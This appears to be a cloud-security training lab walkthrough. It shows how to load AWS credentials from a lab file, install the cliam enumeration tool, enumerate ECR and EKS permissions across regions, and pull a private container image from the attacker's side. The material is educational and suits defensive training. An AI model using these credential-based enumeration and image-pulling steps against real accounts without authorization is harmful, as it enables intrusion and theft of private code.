Enumerate ECR repositories using credentials

⚡ Attention ⚡

💡 Do not switch terminals unless stated below, or you'll need to re-export environment variables.

🛠️ Customization Notice 🛠️

🔧 These commands are tailored for this lab. Adapt them for your specific use case.


  • Change directory
cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve 
  • Export the credentials from cred.txt again.
export AWS_ACCESS_KEY_ID=$(grep -oP '(?<="AccessKeyId" : ")[^"]*' cred.txt) \
&& export AWS_SECRET_ACCESS_KEY=$(grep -oP '(?<="SecretAccessKey" : ")[^"]*' cred.txt) \
&& export AWS_SESSION_TOKEN=$(grep -oP '(?<="Token" : ")[^"]*' cred.txt)
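The export step above depends on GNU grep's -P lookbehind, which is absent on BSD/macOS grep. As an added example (not part of the lab's own scripts), the helper below reads the same "Key" : "value" layout from cred.txt with plain awk, tolerates different spacing around the colon, and fails with a non-zero status when a field is missing or empty; the sample credential file it writes is constructed.

```shell
# cred_field FILE KEY: print the value of "KEY" : "value" from FILE.
# Exits 1 if the key is absent or its value is empty.
cred_field() {
  awk -v key="$2" '
    {
      # match a line such as   "AccessKeyId" : "ASIA..."   (comma optional)
      if (match($0, "\"" key "\"[ \t]*:[ \t]*\"[^\"]*\"")) {
        s = substr($0, RSTART, RLENGTH)
        sub(/^"[^"]*"[ \t]*:[ \t]*"/, "", s)   # drop leading  "KEY" : "
        sub(/"$/, "", s)                        # drop trailing quote
        if (s != "") { print s; found = 1 }
        exit
      }
    }
    END { if (!found) exit 1 }
  ' "$1"
}

# load_aws_creds FILE: export the three variables the lab uses, or return 1
# if any of them cannot be read from the file.
load_aws_creds() {
  AWS_ACCESS_KEY_ID=$(cred_field "$1" AccessKeyId) || return 1
  AWS_SECRET_ACCESS_KEY=$(cred_field "$1" SecretAccessKey) || return 1
  AWS_SESSION_TOKEN=$(cred_field "$1" Token) || return 1
  export AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY AWS_SESSION_TOKEN
}

# write_sample_cred FILE: constructed sample in the cred.txt layout (fake values)
write_sample_cred() {
  cat > "$1" <<'EOF'
{
  "Code" : "Success",
  "AccessKeyId" : "ASIAEXAMPLEKEYID",
  "SecretAccessKey" : "examplesecret/with+slash",
  "Token" : "IQoJb3JpZ2luX2VjEXAMPLETOKEN==",
  "Expiration" : "2030-01-01T00:00:00Z"
}
EOF
}
```

Use it as `load_aws_creds cred.txt || echo "credential file incomplete"` in the same terminal, so the exported variables stay available for the following steps.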
  • Install cliam.
curl -L https://github.com/securisec/cliam/releases/download/2.2.0/cliam-linux-64bit.tar.gz | tar -xz && sudo mv cliam /usr/local/bin/ && sudo chmod +x /usr/local/bin/cliam

  • Let's enumerate the permissions manually.

As this lab is related to EKS & ECR, we will directly enumerate these services.

aws ecr describe-repositories
aws ecr describe-registry
aws eks list-clusters 
🚨 Solution: in case you get the error: An error occurred (AccessDeniedException) 😱.
⚠️ *Don't cheat! Still want the answer?* 👉 *Click below if you're sure...*


  • Let's use cliam to enumerate the permissions for ECR & EKS.
cliam aws enumerate --access-key-id $AWS_ACCESS_KEY_ID --secret-access-key $AWS_SECRET_ACCESS_KEY --session-token $AWS_SESSION_TOKEN ecr

cliam aws enumerate --access-key-id $AWS_ACCESS_KEY_ID --secret-access-key $AWS_SECRET_ACCESS_KEY --session-token $AWS_SESSION_TOKEN eks
⚠️ Still facing the issue No valid aws services detected from cliam as well? 😱
👉 *Check this below..*


  • Run the cliam command again for both services and note what has changed in the commands below: the region is now passed explicitly.
for region in us-east-1 us-west-2; do cliam aws enumerate --access-key-id "$AWS_ACCESS_KEY_ID" --secret-access-key "$AWS_SECRET_ACCESS_KEY" --session-token "$AWS_SESSION_TOKEN" ecr --region $region; done

for region in us-east-1 us-west-2; do cliam aws enumerate --access-key-id "$AWS_ACCESS_KEY_ID" --secret-access-key "$AWS_SECRET_ACCESS_KEY" --session-token "$AWS_SESSION_TOKEN" eks --region $region; done
  • Set the default region with the one-liner below before proceeding further.

It picks the first region in which cliam reports a valid ECR service (an INF line in its output) and exports it as AWS_DEFAULT_REGION.

for region in us-east-1 us-west-2; do
  output=$(cliam aws enumerate --access-key-id "$AWS_ACCESS_KEY_ID" --secret-access-key "$AWS_SECRET_ACCESS_KEY" --session-token "$AWS_SESSION_TOKEN" ecr --region $region)
  
  if echo "$output" | grep -q "INF"; then
    echo "Setting region $region as default"
    export AWS_DEFAULT_REGION=$region
    break
  fi
done
  • Using describe-repositories, list the images in the ECR repository.
export repo=$(aws ecr describe-repositories --query 'repositories[0].repositoryName' --output text) && aws ecr list-images --repository-name "$repo"
  • Similarly, list the running clusters.

The cluster whose name starts with peachycloudsecurity-<randomvalue> is the lab cluster.

aws eks list-clusters 
  • Pull the image from the ECR repository. This also requires the current image tag.

As the attacker does not know which tag the image uses, we use aws ecr list-images and take the tag it returns.

export repo=$(aws ecr describe-repositories --query 'repositories[0].repositoryUri' --output text) && export image=$(aws ecr list-images --repository-name $(echo $repo | cut -d'/' -f2) --query 'imageIds[0].imageTag' --output text) 

docker pull "$repo:$image"
  • The image tag has now been identified; in this case it is latest.
    • Pull the same image with the latest tag to demonstrate that an attacker can first obtain the correct tag and then pull the image.
    • The attacker can also try to guess and pull other image tags using common naming patterns.

In real life, Docker image tags vary from organization to organization. An attacker can pull the image and then re-tag it with the same Docker image tag.

repo=$(aws ecr describe-repositories --query 'repositories[0].repositoryUri' --output text)
image_tag="latest"
docker pull "$repo:$image_tag"

Credit